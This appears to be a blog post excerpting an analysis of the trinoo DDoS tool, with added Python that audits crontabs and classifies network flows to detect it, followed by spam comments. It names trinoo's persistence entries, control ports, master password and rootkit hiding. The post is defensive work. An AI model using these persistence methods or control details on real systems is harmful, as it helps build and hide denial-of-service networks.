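    if not s or s.startswith("#") or VAR_ASSIGNMENT.match(s):
        return None
    if s.startswith("@"):                     # @reboot, @daily, ...
        sched, _, cmd = s.partition(" ")
        return sched, cmd.strip()
    parts = s.split(None, CRON_FIELDS)
    if len(parts) <= CRON_FIELDS:
        return None
    return " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]


def why_suspicious(schedule, command):
    """Heuristics matching the two trinoo start-up methods described."""
    reasons = []
    if schedule == "* * * * *":
        reasons.append("fires every minute")
    elif schedule == "@reboot":
        reasons.append("fires at boot")
    for tok in command.split():
        if tok.startswith(SCRATCH_DIRS):
            reasons.append(f"runs from scratch directory: {tok}")
        components = [c for c in tok.split("/") if c not in ("", ".", "..")]
        if any(c.startswith(".") for c in components):
            reasons.append(f"hidden path component: {tok}")
    return reasons


def audit_crontab(baseline_lines, collected_lines):
    """Entries present in the collected crontab but absent from the baseline,
    each with the reasons it stands out (empty list if none)."""
    known = {e for e in map(parse_entry, baseline_lines) if e}
    findings = []
    for entry in map(parse_entry, collected_lines):
        if entry and entry not in known:
            findings.append({"schedule": entry[0], "command": entry[1],
                             "reasons": why_suspicious(*entry)})
    return findings


BASELINE = """\
# constructed baseline: root crontab recorded when the host was built
SHELL=/bin/sh
15 4 * * * /usr/lib/newsyslog
30 3 * * 0 /usr/sbin/logadm
"""

# Constructed: the baseline plus the two persistence methods from the text.
COLLECTED = BASELINE + """\
* * * * * /usr/sbin/rpc.listen
@reboot /bin/sh /var/adm/.1/c >/dev/null 2>&1
"""

if __name__ == "__main__":
    for f in audit_crontab(BASELINE.splitlines(), COLLECTED.splitlines()):
        print(f["schedule"], f["command"], "->", "; ".join(f["reasons"]))
```

The baseline comparison is what catches /usr/sbin/rpc.listen: the name imitates a system RPC daemon and lives in a system directory, so only the fact that the entry was not there before gives it away. Run the same diff against every user's crontab, not just root's, since the text notes the account may not otherwise use cron at all.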

Even more subtle ways of having trinoo daemons/masters lie in wait for
execution at a given time are easy to envision (e.g., UDP or ICMP
based client/server shells, such as LOKI (see Appendix C) , programs
that wake up periodically and open a listening TCP or UDP port, etc.)

The result of this automation is the ability for attackers to set up
the denial of service network, on widely dispersed systems whose true
owners don't even know are out of their control, in a very short time
frame.

6). Optionally, a "root kit" is installed on the system to hide the
presence of programs, files, and network connections. This is more
important on the master system, since these systems are key to the
trinoo network. (It should be noted that in many cases, masters have
been set up on Internet Service Providers' primary name server hosts,
which would normally have extremely high packet traffic and large
numbers of TCP and UDP connections, which would effectively hide any
trinoo related traffic or activity, and would likely not be detected.
(The fact that these are primary name servers would also tend to make
the owners less likely to take the system off the Internet when
reports begin to come in about suspected denial of service related
activity.)

Root kits would also be used on systems running sniffers that, along
with programs like "hunt" (TCP/IP session hijacking tool) are used to
burrow further into other networks directly, rather than through
remote buffer overrun exploits (e.g., to find sites to set up new file
repositories, etc.)

For more on "root kits" and some ways to get around them, see:

http://staff.washington.edu/dittrich/misc/faqs/rootkits.faq

The network: attacker(s)-->master(s)-->daemon(s)-->victim(s)
------------------------------------------------------------

The trinoo network is made up of a master server ("master.c") and the
trinoo daemon ("ns.c"). A trinoo network would look like this:

            +----------+           +----------+
            | attacker |           | attacker |
            +----------+           +----------+
                 |                      |
. . . -------+---+---------------+------+------------+----- . . .
             |                   |                   |
             |                   |                   |
        +----------+        +----------+        +----------+
        |  master  |        |  master  |        |  master  |
        +----------+        +----------+        +----------+
             |                   |                   |
             |                   |                   |
. . . --+----+--------+----------+--+-------------+--+----------+---- . . .
        |             |             |             |             |
        |             |             |             |             |
    +--------+    +--------+    +--------+    +--------+    +--------+
    | daemon |    | daemon |    | daemon |    | daemon |    | daemon |
    +--------+    +--------+    +--------+    +--------+    +--------+

The attacker(s) control one or more "master" servers, each of which
can control many "daemons" (known in the code as "Bcast", or
"broadcast" hosts.) The daemons are all instructed to coordinate a
packet based attack against one or more victim systems.

All that is then needed is the ability to establish a TCP connection
to the master hosts using "telnet" and the password to the master
server to be able to wage massive, coordinated, denial of service
attacks.

Communication ports
-------------------

Attacker to Master(s): 27665/tcp
Master to daemon(s): 27444/udp
Daemon to Master(s): 31335/udp
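The three port pairs above are enough to map a trinoo network from flow data, provided the ports were not changed in the source (the analysis warns that they can be). As an added example that is not from the original paper, the Python below classifies constructed flow records (proto, src, sport, dst, dport; this field order is my assumption) into the attacker, master and daemon roles and counts how many daemons each master talks to.

```python
"""Map a trinoo network from flow records using the control ports above.
Added example, not from the original analysis.  Flow records are
constructed; their field order (proto src sport dst dport) is assumed."""
from collections import defaultdict

# Destination protocol/port -> channel, straight from the port list above.
TRINOO_CHANNELS = {
    ("tcp", 27665): "attacker->master",
    ("udp", 27444): "master->daemon",
    ("udp", 31335): "daemon->master",
}


def classify_flow(proto, dport):
    """Channel name for a flow's destination, or None if it is not one of
    the three trinoo control ports.  Port-only matching: a build whose
    source was modified to use other ports will not be seen."""
    return TRINOO_CHANNELS.get((proto.lower(), int(dport)))


def parse_flow_line(line):
    proto, src, sport, dst, dport = line.split()
    return proto, src, int(sport), dst, int(dport)


def map_trinoo_network(lines):
    """Assign hosts to roles from which control channels they use and
    count the daemons reachable from each master."""
    roles = defaultdict(set)
    daemons_of = defaultdict(set)
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        proto, src, _sport, dst, dport = parse_flow_line(line)
        channel = classify_flow(proto, dport)
        if channel == "attacker->master":
            roles["attacker"].add(src)
            roles["master"].add(dst)
        elif channel == "master->daemon":
            roles["master"].add(src)
            roles["daemon"].add(dst)
            daemons_of[src].add(dst)
        elif channel == "daemon->master":
            roles["daemon"].add(src)
            roles["master"].add(dst)
    return {
        "roles": {r: sorted(h) for r, h in roles.items()},
        "daemons_per_master": {m: len(d) for m, d in daemons_of.items()},
    }


# Constructed flow records: one attacker, one master, two daemons, plus
# ordinary web and DNS traffic that must not be picked up.
FLOWS = """\
# proto src sport dst dport
tcp 203.0.113.5 41022 198.51.100.10 27665
udp 198.51.100.10 27444 192.0.2.11 27444
udp 198.51.100.10 27444 192.0.2.12 27444
udp 192.0.2.11 31335 198.51.100.10 31335
udp 192.0.2.12 31335 198.51.100.10 31335
tcp 192.0.2.50 51514 192.0.2.60 80
udp 192.0.2.11 53 192.0.2.1 53
"""

if __name__ == "__main__":
    print(map_trinoo_network(FLOWS.splitlines()))
```

A single host appearing in two roles (a daemon that also receives 27665/tcp, say) is worth a closer look rather than a classifier bug: the analysis notes that masters and daemons are installed on the same kinds of compromised systems.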

Remote control of the trinoo master is accomplished via a TCP
connection to port 27665/tcp. After connecting, the user must give
the proper password ("betaalmostdone"). If

3 comments:

  1. Your post is really informative for me. I liked it very much.

    Dating Russian Girls

  2. Wonderful information. I had come to know about your blog from my friend Nandu, Hyderabad. I have read at least 7 posts of yours by now, and let me tell you, your website gives the best and the most interesting information. This is just the kind of information that I had been looking for. I'm already your RSS reader now and I would regularly watch out for the new posts. Once again hats off to you! Thanks a ton once again. Regards, atozlatestsongs free download

    regards
    alekhya
    http://atozlatestmp3.com/endukante-premanta-ram2012telugu-songs-free-download/

  3. SSL connections: /Server -e irc.Priv8.jp +6697
    IRC connections: /Server irc.Priv8.jp +6667
    IRC connections: /Server irc.Priv8.jp +7000
    IPV6 connections: /Server ipv6.Priv8.jp +6667
    IPV6 SSL connections: /Server -e ipv6.Priv8.jp +6697

    WEBCHAT: http://Priv8.jp
